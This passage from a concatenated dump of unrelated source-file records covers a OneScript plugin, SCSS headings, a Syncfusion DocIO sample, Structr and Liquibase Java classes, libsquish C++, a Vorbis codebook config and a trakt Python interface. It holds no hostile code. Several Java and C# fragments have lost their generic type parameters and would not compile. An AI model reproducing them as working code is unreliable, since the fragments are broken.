<Тип.Вид> - <описание возвращаемого значения>\n//\nФункция Версия() Экспорт\n\tВозврат \"0.0.1\";\nКонецФункции\n\n// <Описание функции>\n//\n// Возвращаемое значение:\n// <Тип.Вид> - <описание возвращаемого значения>\n//\nФункция Описание() Экспорт\n\tВозврат \"Тестовый плагин\";\nКонецФункции\n\n// <Описание функции>\n//\n// Возвращаемое значение:\n// <Тип.Вид> - <описание возвращаемого значения>\n//\nФункция Справка() Экспорт\n\tВозврат \"Справка плагина\";\nКонецФункции\n\n// <Описание функции>\n//\n// Возвращаемое значение:\n// <Тип.Вид> - <описание возвращаемого значения>\n//\nФункция Имя() Экспорт\n\tВозврат \"test_plugin\";\nКонецФункции\n\n// <Описание функции>\n//\n// Возвращаемое значение:\n// <Тип.Вид> - <описание возвращаемого значения>\n//\nФункция ИмяЛога() Экспорт\n\tВозврат \"oscript.lib.gitsync.test_plugin\";\nКонецФункции\n\n// <Описание функции>\n//\n// Возвращаемое значение:\n// <Тип.Вид> - <описание возвращаемого значения>\n//\nФункция Приоритет() Экспорт\n\tВозврат 1;\nКонецФункции\n\n#КонецОбласти\n\nЛог = Логирование.ПолучитьЛог(ИмяЛога());\n\n"} {"text": ".h1,\n.h2,\n.h3,\n.h4,\n.h5,\n.h6,\nh1,\nh2,\nh3,\nh4,\nh5,\nh6 {\n margin-bottom: .5rem;\n font-family: inherit;\n font-weight: 500;\n line-height: 1.2;\n color: inherit;\n}\n\nh1,\n.h1 {\n margin: 0;\n padding: 15px 0 0;\n font-weight: 700;\n font-size: 2.5rem;\n\n @include mq('handheld-and-up') {\n font-size: 3rem;\n }\n\n @include mq('print') {\n font-size: 18pt;\n padding: 0 0 5px;\n }\n}\n\nh2,\n.h2 {\n font-size: 2rem;\n}\n\nh3,\n.h3 {\n font-size: 1.2rem;\n font-weight: 700;\n\n @include mq('handheld-and-up') {\n font-size: 1.3rem;\n }\n}\n\nh4,\n.h4 {\n font-size: 1.2rem;\n font-weight: 700;\n\n @include mq('handheld-and-up') {\n font-size: 1.3rem;\n }\n}\n"} {"text": "#region Copyright Syncfusion Inc. 2001-2020.\n// Copyright Syncfusion Inc. 2001-2020. All rights reserved.\n// Use of this code is subject to the terms of our license.\n// A copy of the current license can be obtained at any time by e-mailing\n// licensing@syncfusion.com. Any infringement will be prosecuted under\n// applicable laws. \n#endregion\nusing System;\nusing System.IO;\nusing System.Reflection;\nusing SampleBrowser.Core;\nusing Syncfusion.DocIO;\nusing Syncfusion.DocIO.DLS;\nusing Xamarin.Forms;\n\nnamespace SampleBrowser.DocIO\n{\n ///

\n /// A sample view that can be used on FormFillingAndProtection.\n /// \n public partial class FormFillingAndProtection : SampleView\n {\n /// \n /// Constructor for FormFillingAndProtection.\n /// \n public FormFillingAndProtection()\n {\n InitializeComponent();\n\n if (Device.Idiom != TargetIdiom.Phone && Device.RuntimePlatform == Device.UWP)\n {\n \n this.Content_1.HorizontalOptions = LayoutOptions.Start;\n this.btnGenerate.HorizontalOptions = LayoutOptions.Start;\n\n \n this.Content_1.VerticalOptions = LayoutOptions.Center;\n this.btnGenerate.VerticalOptions = LayoutOptions.Center;\n\t\t\t\tthis.btnGenerate.BackgroundColor = Xamarin.Forms.Color.Gray;\n }\n else if (Device.Idiom == TargetIdiom.Phone && Device.RuntimePlatform == Device.UWP)\n {\n //if (!SampleBrowser.DocIO.App.isUWP)\n //{\n // this.Content_1.FontSize = 18.5;\n //}\n //else\n //{\n this.Content_1.FontSize = 13.5;\n // }\n \n this.Content_1.VerticalOptions = LayoutOptions.Center;\n this.btnGenerate.VerticalOptions = LayoutOptions.Center;\n }\n }\n /// \n /// Button click event for FormFillingAndProtection.\n /// \n /// Sender\n /// Event args\n private void OnButtonClicked(object sender, EventArgs e)\n {\n#if COMMONSB\n string rootPath = \"SampleBrowser.Samples.DocIO.Samples.Templates.\";\n#else\n string rootPath = \"SampleBrowser.DocIO.Samples.Templates.\";\n#endif\n // Load Template document stream.\n Stream inputStream = typeof(FormFillingAndProtection).GetTypeInfo().Assembly.GetManifestResourceStream(rootPath + \"ContentControlTemplate.docx\");\n\n // Creates an empty Word document instance.\n WordDocument document = new WordDocument();\n // Opens template document.\n document.Open(inputStream, FormatType.Docx);\n\n IWTextRange textRange;\n //Gets table from the template document.\n IWTable table = document.LastSection.Tables[0];\n WTableRow row = table.Rows[1];\n\n #region Inserting content controls\n\n #region Calendar content control\n IWParagraph cellPara = row.Cells[0].Paragraphs[0];\n //Accesses the date picker content control.\n IInlineContentControl inlineControl = (cellPara.ChildEntities[2] as IInlineContentControl);\n textRange = inlineControl.ParagraphItems[0] as WTextRange;\n //Sets today's date to display.\n textRange.Text = DateTime.Now.ToString(\"d\");\n textRange.CharacterFormat.FontSize = 14;\n //Protects the content control.\n inlineControl.ContentControlProperties.LockContents = true;\n #endregion\n\n #region Plain text content controls\n table = document.LastSection.Tables[1];\n row = table.Rows[0];\n cellPara = row.Cells[0].LastParagraph;\n //Accesses the plain text content control.\n inlineControl = (cellPara.ChildEntities[1] as IInlineContentControl);\n //Protects the content control.\n inlineControl.ContentControlProperties.LockContents = true;\n textRange = inlineControl.ParagraphItems[0] as WTextRange;\n //Sets text in plain text content control.\n textRange.Text = \"Northwind Analytics\";\n textRange.CharacterFormat.FontSize = 14;\n\n cellPara = row.Cells[1].LastParagraph;\n //Accesses the plain text content control.\n inlineControl = (cellPara.ChildEntities[1] as IInlineContentControl);\n //Protects the content control.\n inlineControl.ContentControlProperties.LockContents = true;\n textRange = inlineControl.ParagraphItems[0] as WTextRange;\n //Sets text in plain text content control.\n textRange.Text = \"Northwind\";\n textRange.CharacterFormat.FontSize = 14;\n\n row = table.Rows[1];\n cellPara = row.Cells[0].LastParagraph;\n //Accesses the plain text content control.\n inlineControl = (cellPara.ChildEntities[1] as IInlineContentControl);\n //Protects the content control.\n inlineControl.ContentControlProperties.LockContents = true;\n //Sets text in plain text content control.\n textRange = inlineControl.ParagraphItems[0] as WTextRange;\n textRange.Text = \"10\";\n textRange.CharacterFormat.FontSize = 14;\n\n\n cellPara = row.Cells[1].LastParagraph;\n //Accesses the plain text content control.\n inlineControl = (cellPara.ChildEntities[1] as IInlineContentControl);\n //Protects the content control.\n inlineControl.ContentControlProperties.LockContents = true;\n //Sets text in plain text content control.\n textRange = inlineControl.ParagraphItems[0] as WTextRange;\n textRange.Text = \"Nancy Davolio\";\n textRange.CharacterFormat.FontSize = 14;\n #endregion\n\n #region CheckBox Content control\n row = table.Rows[2];\n cellPara = row.Cells[0].LastParagraph;\n //Inserts checkbox content control.\n inlineControl = cellPara.AppendInlineContentControl(ContentControlType.CheckBox);\n inlineControl.ContentControlProperties.LockContents = true;\n //Sets checkbox as checked state.\n inlineControl.ContentControlProperties.IsChecked = true;\n textRange = cellPara.AppendText(\"C#, \");\n textRange.CharacterFormat.FontSize = 14;\n\n //Inserts checkbox content control.\n inlineControl = cellPara.AppendInlineContentControl(ContentControlType.CheckBox);\n inlineControl.ContentControlProperties.LockContents = true;\n //Sets checkbox as checked state.\n inlineControl.ContentControlProperties.IsChecked = true;\n textRange = cellPara.AppendText(\"VB\");\n textRange.CharacterFormat.FontSize = 14;\n #endregion\n\n\n #region Drop down list content control\n cellPara = row.Cells[1].LastParagraph;\n //Accesses the dropdown list content control.\n inlineControl = (cellPara.ChildEntities[1] as IInlineContentControl);\n inlineControl.ContentControlProperties.LockContents = true;\n //Sets default option to display.\n textRange = inlineControl.ParagraphItems[0] as WTextRange;\n textRange.Text = \"ASP.NET\";\n textRange.CharacterFormat.FontSize = 14;\n inlineControl.ParagraphItems.Add(textRange);\n\n //Adds items to the dropdown list.\n ContentControlListItem item;\n item = new ContentControlListItem();\n item.DisplayText = \"ASP.NET MVC\";\n item.Value = \"2\";\n inlineControl.ContentControlProperties.ContentControlListItems.Add(item);\n\n item = new ContentControlListItem();\n item.DisplayText = \"Windows Forms\";\n item.Value = \"3\";\n inlineControl.ContentControlProperties.ContentControlListItems.Add(item);\n\n item = new ContentControlListItem();\n item.DisplayText = \"WPF\";\n item.Value = \"4\";\n inlineControl.ContentControlProperties.ContentControlListItems.Add(item);\n\n item = new ContentControlListItem();\n item.DisplayText = \"Xamarin\";\n item.Value = \"5\";\n inlineControl.ContentControlProperties.ContentControlListItems.Add(item);\n #endregion\n\n #region Calendar content control\n row = table.Rows[3];\n cellPara = row.Cells[0].LastParagraph;\n //Accesses the date picker content control.\n inlineControl = (cellPara.ChildEntities[1] as IInlineContentControl);\n inlineControl.ContentControlProperties.LockContents = true;\n //Sets default date to display.\n textRange = inlineControl.ParagraphItems[0] as WTextRange;\n textRange.Text = DateTime.Now.AddDays(-5).ToString(\"d\");\n textRange.CharacterFormat.FontSize = 14;\n\n cellPara = row.Cells[1].LastParagraph;\n //Inserts date picker content control.\n inlineControl = (cellPara.ChildEntities[1] as IInlineContentControl);\n inlineControl.ContentControlProperties.LockContents = true;\n //Sets default date to display.\n textRange = inlineControl.ParagraphItems[0] as WTextRange;\n textRange.Text = DateTime.Now.AddDays(10).ToString(\"d\");\n textRange.CharacterFormat.FontSize = 14;\n #endregion\n\n #endregion\n #region Block content control\n //Accesses the block content control.\n BlockContentControl blockContentControl = ((document.ChildEntities[0] as WSection).Body.ChildEntities[2] as BlockContentControl);\n //Protects the block content control\n blockContentControl.ContentControlProperties.LockContents = true;\n #endregion\n\n MemoryStream stream = new MemoryStream();\n document.Save(stream, FormatType.Docx);\n document.Close();\n\n if (Device.RuntimePlatform == Device.UWP)\n DependencyService.Get()\n .Save(\"FormFillingAndProtection.docx\", \"application/msword\", stream);\n else\n DependencyService.Get().Save(\"FormFillingAndProtection.docx\", \"application/msword\", stream);\n }\n }\n}\n"} {"text": "/*\n * Copyright (C) 2010-2020 Structr GmbH\n *\n * This file is part of Structr .\n *\n * Structr is free software: you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as\n * published by the Free Software Foundation, either version 3 of the\n * License, or (at your option) any later version.\n *\n * Structr is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with Structr. If not, see .\n */\npackage org.structr.memgraph;\n\nimport java.util.Iterator;\nimport java.util.LinkedList;\nimport java.util.List;\nimport org.neo4j.driver.v1.types.Path.Segment;\nimport org.neo4j.driver.v1.types.Relationship;\nimport org.structr.api.NotFoundException;\nimport org.structr.api.graph.Path;\nimport org.structr.api.graph.PropertyContainer;\n\n\n/**\n *\n */\nclass PathWrapper implements Path {\n\n\tprivate org.neo4j.driver.v1.types.Path path = null;\n\tprivate MemgraphDatabaseService db = null;\n\n\tpublic PathWrapper(final MemgraphDatabaseService db, final org.neo4j.driver.v1.types.Path path) {\n\n\t\tthis.path = path;\n\t\tthis.db = db;\n\t}\n\n\t@Override\n\tpublic Iterator iterator() {\n\n\t\tif (path.length() > 0) {\n\n\t\t\treturn new SegmentIterator(path);\n\t\t}\n\n\t\tfinal List list = new LinkedList<>();\n\t\tlist.add(NodeWrapper.newInstance(db, path.start()));\n\n\t\treturn list.iterator();\n\t}\n\n\t// ----- nested classes -----\n\tprivate class SegmentIterator implements Iterator {\n\n\t\tprivate Iterator it = null;\n\t\tprivate Segment current = null;\n\t\tprivate int state = 0;\n\n\t\tpublic SegmentIterator(final org.neo4j.driver.v1.types.Path path) {\n\t\t\tthis.it = path.iterator();\n\t\t}\n\n\t\t@Override\n\t\tpublic boolean hasNext() {\n\t\t\treturn state < 3;\n\t\t}\n\n\t\t@Override\n\t\tpublic PropertyContainer next() {\n\n\t\t\tif (current == null) {\n\n\t\t\t\tcurrent = it.next();\n\t\t\t}\n\n\t\t\tswitch (state) {\n\n\t\t\t\tcase 0:\n\t\t\t\t\tstate = 1;\n\t\t\t\t\treturn NodeWrapper.newInstance(db, current.start());\n\n\t\t\t\tcase 1:\n\t\t\t\t\tfinal Relationship rel = current.relationship();\n\t\t\t\t\tif (it.hasNext()) {\n\n\t\t\t\t\t\tstate = 0;\n\t\t\t\t\t\tcurrent = null;\n\n\t\t\t\t\t} else {\n\n\t\t\t\t\t\tstate = 2;\n\t\t\t\t\t}\n\t\t\t\t\treturn RelationshipWrapper.newInstance(db, rel);\n\n\t\t\t\tcase 2:\n\t\t\t\t\tstate = 3;\n\t\t\t\t\treturn NodeWrapper.newInstance(db, current.end());\n\t\t\t}\n\n\t\t\tthrow new NotFoundException(\"No such element.\");\n\t\t}\n\n\t\t@Override\n\t\tpublic void remove() {\n\t\t\tthrow new UnsupportedOperationException(\"Removal not supported.\");\n\t\t}\n\t}\n\n}\n"} {"text": "package liquibase.ext.hibernate.database.connection;\n\nimport liquibase.resource.ResourceAccessor;\n\nimport java.io.IOException;\nimport java.io.StringReader;\nimport java.net.URLDecoder;\nimport java.sql.*;\nimport java.util.Map;\nimport java.util.Properties;\nimport java.util.concurrent.Executor;\n\n/**\n * Implements java.sql.Connection in order to pretend a hibernate configuration is a database in order to fit into the Liquibase framework.\n * Beyond standard Connection methods, this class exposes {@link #getPrefix()}, {@link #getPath()} and {@link #getProperties()} to access the setting passed in the JDBC URL.\n */\npublic class HibernateConnection implements Connection {\n private String prefix;\n private String url;\n\n private String path;\n private ResourceAccessor resourceAccessor;\n private Properties properties;\n\n public HibernateConnection(String url, ResourceAccessor resourceAccessor) {\n this.url = url;\n\n this.prefix = url.replaceFirst(\":[^:]+$\", \"\");\n\n // Trim the prefix off the URL for the path\n path = url.substring(prefix.length() + 1);\n this.resourceAccessor = resourceAccessor;\n\n // Check if there is a parameter/query string value.\n properties = new Properties();\n\n int queryIndex = path.indexOf('?');\n if (queryIndex >= 0) {\n // Convert the query string into properties\n properties.putAll(readProperties(path.substring(queryIndex + 1)));\n\n if (properties.containsKey(\"dialect\") && !properties.containsKey(\"hibernate.dialect\")) {\n properties.put(\"hibernate.dialect\", properties.getProperty(\"dialect\"));\n }\n\n // Remove the query string\n path = path.substring(0, queryIndex);\n }\n }\n\n /**\n * Creates properties to attach to this connection based on the passed query string.\n */\n protected Properties readProperties(String queryString) {\n Properties properties = new Properties();\n queryString = queryString.replaceAll(\"&\", System.getProperty(\"line.separator\"));\n try {\n queryString = URLDecoder.decode(queryString, \"UTF-8\");\n properties.load(new StringReader(queryString));\n } catch (IOException ioe) {\n throw new IllegalStateException(\"Failed to read properties from url\", ioe);\n }\n\n return properties;\n }\n\n /**\n * Returns the entire connection URL\n */\n public String getUrl() {\n return url;\n }\n\n\n /**\n * Returns the 'protocol' of the URL. For example, \"hibernate:classic\" or \"hibernate:ejb3\"\n */\n public String getPrefix() {\n return prefix;\n }\n\n /**\n * The portion of the url between the path and the query string. Normally a filename or a class name.\n */\n public String getPath() {\n return path;\n }\n\n /**\n * The set of properties provided by the URL. Eg:\n *

\n * hibernate:classic:/path/to/hibernate.cfg.xml?foo=bar\n *

\n * This will have a property called 'foo' with a value of 'bar'.\n */\n public Properties getProperties() {\n return properties;\n }\n\n\n ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////\n /// JDBC METHODS\n ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////\n\n public Statement createStatement() throws SQLException {\n return null;\n }\n\n public PreparedStatement prepareStatement(String sql) throws SQLException {\n return null;\n }\n\n public CallableStatement prepareCall(String sql) throws SQLException {\n return null;\n }\n\n public String nativeSQL(String sql) throws SQLException {\n return null;\n }\n\n public void setAutoCommit(boolean autoCommit) throws SQLException {\n\n }\n\n public boolean getAutoCommit() throws SQLException {\n return false;\n }\n\n public void commit() throws SQLException {\n\n }\n\n public void rollback() throws SQLException {\n\n }\n\n public void close() throws SQLException {\n\n }\n\n public boolean isClosed() throws SQLException {\n return false;\n }\n\n public DatabaseMetaData getMetaData() throws SQLException {\n return new HibernateConnectionMetadata(url);\n }\n\n public void setReadOnly(boolean readOnly) throws SQLException {\n\n }\n\n public boolean isReadOnly() throws SQLException {\n return true;\n }\n\n public void setCatalog(String catalog) throws SQLException {\n\n }\n\n public String getCatalog() throws SQLException {\n return \"HIBERNATE\";\n }\n\n public void setTransactionIsolation(int level) throws SQLException {\n\n }\n\n public int getTransactionIsolation() throws SQLException {\n return 0;\n }\n\n public SQLWarning getWarnings() throws SQLException {\n return null;\n }\n\n public void clearWarnings() throws SQLException {\n\n }\n\n public Statement createStatement(int resultSetType, int resultSetConcurrency) throws SQLException {\n return null;\n }\n\n public PreparedStatement prepareStatement(String sql, int resultSetType, int resultSetConcurrency) throws SQLException {\n return null;\n }\n\n public CallableStatement prepareCall(String sql, int resultSetType, int resultSetConcurrency) throws SQLException {\n return null;\n }\n\n public Map> getTypeMap() throws SQLException {\n return null;\n }\n\n public void setTypeMap(Map> map) throws SQLException {\n\n }\n\n public void setHoldability(int holdability) throws SQLException {\n\n }\n\n public int getHoldability() throws SQLException {\n return 0;\n }\n\n public Savepoint setSavepoint() throws SQLException {\n return null;\n }\n\n public Savepoint setSavepoint(String name) throws SQLException {\n return null;\n }\n\n public void rollback(Savepoint savepoint) throws SQLException {\n\n }\n\n public void releaseSavepoint(Savepoint savepoint) throws SQLException {\n\n }\n\n public Statement createStatement(int resultSetType, int resultSetConcurrency, int resultSetHoldability) throws SQLException {\n return null;\n }\n\n public PreparedStatement prepareStatement(String sql, int resultSetType, int resultSetConcurrency, int resultSetHoldability) throws SQLException {\n return null;\n }\n\n public CallableStatement prepareCall(String sql, int resultSetType, int resultSetConcurrency, int resultSetHoldability) throws SQLException {\n return null;\n }\n\n public PreparedStatement prepareStatement(String sql, int autoGeneratedKeys) throws SQLException {\n return null;\n }\n\n public PreparedStatement prepareStatement(String sql, int[] columnIndexes) throws SQLException {\n return null;\n }\n\n public PreparedStatement prepareStatement(String sql, String[] columnNames) throws SQLException {\n return null;\n }\n\n public Clob createClob() throws SQLException {\n return null;\n }\n\n public Blob createBlob() throws SQLException {\n return null;\n }\n\n public NClob createNClob() throws SQLException {\n return null;\n }\n\n public SQLXML createSQLXML() throws SQLException {\n return null;\n }\n\n public boolean isValid(int timeout) throws SQLException {\n return false;\n }\n\n public void setClientInfo(String name, String value) throws SQLClientInfoException {\n\n }\n\n public void setClientInfo(Properties properties) throws SQLClientInfoException {\n\n }\n\n public String getClientInfo(String name) throws SQLException {\n return null;\n }\n\n public Properties getClientInfo() throws SQLException {\n return null;\n }\n\n public Array createArrayOf(String typeName, Object[] elements) throws SQLException {\n return null;\n }\n\n public Struct createStruct(String typeName, Object[] attributes) throws SQLException {\n return null;\n }\n\n public T unwrap(Class iface) throws SQLException {\n return null;\n }\n\n public boolean isWrapperFor(Class iface) throws SQLException {\n return false;\n }\n\n //@Override only in java 1.7\n public void abort(Executor arg0) throws SQLException {\n }\n\n //@Override only in java 1.7\n public int getNetworkTimeout() throws SQLException {\n return 0;\n }\n\n //@Override only in java 1.7\n public String getSchema() throws SQLException {\n return \"HIBERNATE\";\n }\n\n //@Override only in java 1.7\n public void setNetworkTimeout(Executor arg0, int arg1) throws SQLException {\n }\n\n //@Override only in java 1.7\n public void setSchema(String arg0) throws SQLException {\n }\n\n public ResourceAccessor getResourceAccessor() {\n return resourceAccessor;\n }\n}\n"} {"text": "/* -----------------------------------------------------------------------------\n\n\tCopyright (c) 2006 Simon Brown si@sjbrown.co.uk\n\n\tPermission is hereby granted, free of charge, to any person obtaining\n\ta copy of this software and associated documentation files (the \n\t\"Software\"), to\tdeal in the Software without restriction, including\n\twithout limitation the rights to use, copy, modify, merge, publish,\n\tdistribute, sublicense, and/or sell copies of the Software, and to \n\tpermit persons to whom the Software is furnished to do so, subject to \n\tthe following conditions:\n\n\tThe above copyright notice and this permission notice shall be included\n\tin all copies or substantial portions of the Software.\n\n\tTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\n\tOR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF \n\tMERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\n\tIN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY \n\tCLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, \n\tTORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE \n\tSOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\t\n -------------------------------------------------------------------------- */\n \n#include \"colourset.h\"\n\nnamespace squish {\n\nColourSet::ColourSet( u8 const* rgba, int mask, int flags )\n : m_count( 0 ), \n\tm_transparent( false )\n{\n\t// check the compression mode for dxt1\n\tbool isDxt1 = ( ( flags & kDxt1 ) != 0 );\n\tbool weightByAlpha = ( ( flags & kWeightColourByAlpha ) != 0 );\n\n\t// create the minimal set\n\tfor( int i = 0; i < 16; ++i )\n\t{\n\t\t// check this pixel is enabled\n\t\tint bit = 1 << i;\n\t\tif( ( mask & bit ) == 0 )\n\t\t{\n\t\t\tm_remap[i] = -1;\n\t\t\tcontinue;\n\t\t}\n\t\n\t\t// check for transparent pixels when using dxt1\n\t\tif( isDxt1 && rgba[4*i + 3] < 128 )\n\t\t{\n\t\t\tm_remap[i] = -1;\n\t\t\tm_transparent = true;\n\t\t\tcontinue;\n\t\t}\n\n\t\t// loop over previous points for a match\n\t\tfor( int j = 0;; ++j )\n\t\t{\n\t\t\t// allocate a new point\n\t\t\tif( j == i )\n\t\t\t{\n\t\t\t\t// normalise coordinates to [0,1]\n\t\t\t\tfloat x = ( float )rgba[4*i] / 255.0f;\n\t\t\t\tfloat y = ( float )rgba[4*i + 1] / 255.0f;\n\t\t\t\tfloat z = ( float )rgba[4*i + 2] / 255.0f;\n\t\t\t\t\n\t\t\t\t// ensure there is always non-zero weight even for zero alpha\n\t\t\t\tfloat w = ( float )( rgba[4*i + 3] + 1 ) / 256.0f;\n\n\t\t\t\t// add the point\n\t\t\t\tm_points[m_count] = Vec3( x, y, z );\n\t\t\t\tm_weights[m_count] = ( weightByAlpha ? w : 1.0f );\n\t\t\t\tm_remap[i] = m_count;\n\t\t\t\t\n\t\t\t\t// advance\n\t\t\t\t++m_count;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\n\t\t\t// check for a match\n\t\t\tint oldbit = 1 << j;\n\t\t\tbool match = ( ( mask & oldbit ) != 0 )\n\t\t\t\t&& ( rgba[4*i] == rgba[4*j] )\n\t\t\t\t&& ( rgba[4*i + 1] == rgba[4*j + 1] )\n\t\t\t\t&& ( rgba[4*i + 2] == rgba[4*j + 2] )\n\t\t\t\t&& ( rgba[4*j + 3] >= 128 || !isDxt1 );\n\t\t\tif( match )\n\t\t\t{\n\t\t\t\t// get the index of the match\n\t\t\t\tint index = m_remap[j];\n\t\t\t\t\n\t\t\t\t// ensure there is always non-zero weight even for zero alpha\n\t\t\t\tfloat w = ( float )( rgba[4*i + 3] + 1 ) / 256.0f;\n\n\t\t\t\t// map to this point and increase the weight\n\t\t\t\tm_weights[index] += ( weightByAlpha ? w : 1.0f );\n\t\t\t\tm_remap[i] = index;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t}\n\n\t// square root the weights\n\tfor( int i = 0; i < m_count; ++i )\n\t\tm_weights[i] = std::sqrt( m_weights[i] );\n}\n\nvoid ColourSet::RemapIndices( u8 const* source, u8* target ) const\n{\n\tfor( int i = 0; i < 16; ++i )\n\t{\n\t\tint j = m_remap[i];\n\t\tif( j == -1 )\n\t\t\ttarget[i] = 3;\n\t\telse\n\t\t\ttarget[i] = source[j];\n\t}\n}\n\n} // namespace squish\n"} {"text": "\nGO\n\n>_16c0_s noninterleaved\nhaux 16c0_s/resaux_0.vqd _16c0_s_single 0,64,2 10\n\t\n:_p1_0 16c0_s/res_sub0_part1_pass2.vqd, 8, nonseq cull, 0 +- 1\n:_p2_0 16c0_s/res_sub0_part2_pass2.vqd, 4, nonseq cull, 0 +- 1 2\n:_p3_0 16c0_s/res_sub0_part3_pass2.vqd, 4, nonseq cull, 0 +- 1 2\n:_p4_0 16c0_s/res_sub0_part4_pass2.vqd, 2, nonseq cull, 0 +- 1 2 3 4\n:_p5_0 16c0_s/res_sub0_part5_pass2.vqd, 2, nonseq cull, 0 +- 1 2 3 4\n:_p6_0 16c0_s/res_sub0_part6_pass2.vqd, 2, nonseq cull, 0 +- 1 2 3 4 5 6 7 8\n\n\n:_p7_0 16c0_s/res_sub0_part7_pass0.vqd, 4, nonseq cull, 0 +- 11\n:_p7_1 16c0_s/res_sub0_part7_pass1.vqd, 2, nonseq cull, 0 +- 1 2 3 4 5 \n\n:_p8_0 16c0_s/res_sub0_part8_pass0.vqd, 2, nonseq cull, 0 +- 5 10 15 20 25 30\n:_p8_1 16c0_s/res_sub0_part8_pass1.vqd, 2, nonseq cull, 0 +- 1 2 \n\n:_p9_0 16c0_s/res_sub0_part9_pass0.vqd, 4, nonseq, 0 +- 315\n:_p9_1 16c0_s/res_sub0_part9_pass1.vqd, 2, nonseq, 0 +- 21 42 63 84 105 126 147\n:_p9_2 16c0_s/res_sub0_part9_pass2.vqd, 2, nonseq, 0 +- 1 2 3 4 5 6 7 8 9 10\n\n>_16c1s_s noninterleaved\nhaux 16c1_s/resaux_0.vqd _16c1_s_short 0,64,2 10\n\n>_16c1_s noninterleaved\nhaux 16c1_s/resaux_1.vqd _16c1_s_long 0,64,2 10\n\t\n:_p1_0 16c1_s/res_sub0_part1_pass2.vqd, 8, nonseq cull, 0 +- 1\n:_p2_0 16c1_s/res_sub0_part2_pass2.vqd, 4, nonseq cull, 0 +- 1 2\n:_p3_0 16c1_s/res_sub0_part3_pass2.vqd, 4, nonseq cull, 0 +- 1 2\n:_p4_0 16c1_s/res_sub0_part4_pass2.vqd, 2, nonseq cull, 0 +- 1 2 3 4\n:_p5_0 16c1_s/res_sub0_part5_pass2.vqd, 2, nonseq cull, 0 +- 1 2 3 4\n:_p6_0 16c1_s/res_sub0_part6_pass2.vqd, 2, nonseq cull, 0 +- 1 2 3 4 5 6 7 8\n\n\n:_p7_0 16c1_s/res_sub0_part7_pass0.vqd, 4, nonseq cull, 0 +- 11\n:_p7_1 16c1_s/res_sub0_part7_pass1.vqd, 2, nonseq cull, 0 +- 1 2 3 4 5 \n\n:_p8_0 16c1_s/res_sub0_part8_pass0.vqd, 2, nonseq cull, 0 +- 5 10 15 20 25 30\n:_p8_1 16c1_s/res_sub0_part8_pass1.vqd, 2, nonseq cull, 0 +- 1 2 \n\n:_p9_0 16c1_s/res_sub0_part9_pass0.vqd, 2, nonseq, 0 +- 315 630 945 1260 1575 1890\n:_p9_1 16c1_s/res_sub0_part9_pass1.vqd, 2, nonseq, 0 +- 21 42 63 84 105 126 147\n:_p9_2 16c1_s/res_sub0_part9_pass2.vqd, 2, nonseq, 0 +- 1 2 3 4 5 6 7 8 9 10\n\n>_16c2s_s noninterleaved\nhaux 16c2_s/resaux_0.vqd _16c2_s_short 0,64,2 10\n>_16c2_s noninterleaved\nhaux 16c2_s/resaux_1.vqd _16c2_s_long 0,64,2 10\n \n:_p1_0 16c2_s/res_sub0_part1_pass2.vqd, 4, nonseq cull, 0 +- 1\n:_p2_0 16c2_s/res_sub0_part2_pass2.vqd, 4, nonseq cull, 0 +- 1 2\n:_p3_0 16c2_s/res_sub0_part3_pass2.vqd, 2, nonseq cull, 0 +- 1 2 3 4\n:_p4_0 16c2_s/res_sub0_part4_pass2.vqd, 2, nonseq cull, 0 +- 1 2 3 4 5 6 7 8\n\n:_p5_0 16c2_s/res_sub0_part5_pass0.vqd, 4, nonseq cull, 0 +- 11\n:_p5_1 16c2_s/res_sub0_part5_pass1.vqd, 2, nonseq cull, 0 +- 1 2 3 4 5 \n\n:_p6_0 16c2_s/res_sub0_part6_pass0.vqd, 2, nonseq cull, 0 +- 5 10 15 20 25 30\n:_p6_1 16c2_s/res_sub0_part6_pass1.vqd, 2, nonseq cull, 0 +- 1 2 \n\n:_p7_0 16c2_s/res_sub0_part7_pass0.vqd, 2, nonseq, 0 +- 11 22 33 44 55 66\n:_p7_1 16c2_s/res_sub0_part7_pass1.vqd, 2, nonseq cull, 0 +- 1 2 3 4 5\n\n:_p8_0 16c2_s/res_sub0_part8_pass0.vqd, 2, nonseq, 0 +- 21 42 63 84 105 126 147\n:_p8_1 16c2_s/res_sub0_part8_pass1.vqd, 2, nonseq cull, 0 +- 1 2 3 4 5 6 7 8 9 10\n\n:_p9_0 16c2_s/res_sub0_part9_pass0.vqd, 2, nonseq, 0 +- 931 1862 2793 3724 4655 5586 6517 7448 \n:_p9_1 16c2_s/res_sub0_part9_pass1.vqd, 2, nonseq, 0 +- 49 98 147 196 245 294 343 392 441\n:_p9_2 16c2_s/res_sub0_part9_pass2.vqd, 1, nonseq, 0 +- 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 \n\n"} {"text": "from __future__ import absolute_import, division, print_function\n\nfrom trakt.interfaces.base import authenticated\nfrom trakt.interfaces.sync.core.mixins import Get, Add, Remove\n\n\nclass SyncWatchlistInterface(Get, Add, Remove):\n path = 'sync/watchlist'\n flags = {'in_watchlist': True}\n\n def get(self, media=None, page=1, per_page=10, start_at=None, end_at=None, store=None, **kwargs):\n # Build query\n query = {}\n\n if page:\n query['page'] = page\n\n if per_page:\n query['limit'] = per_page\n\n # Request watched history\n return super(SyncWatchlistInterface, self).get(\n media, store,\n query=query,\n flat=media is None,\n **kwargs\n )\n\n @authenticated\n def seasons(self, store=None, **kwargs):\n return self.get(\n 'seasons',\n store,\n **kwargs\n )\n\n @authenticated\n def episodes(self, store=None, **kwargs):\n return self.get(\n 'episodes',\n store,\n **kwargs\n )\n"} {"text": "// RUN: 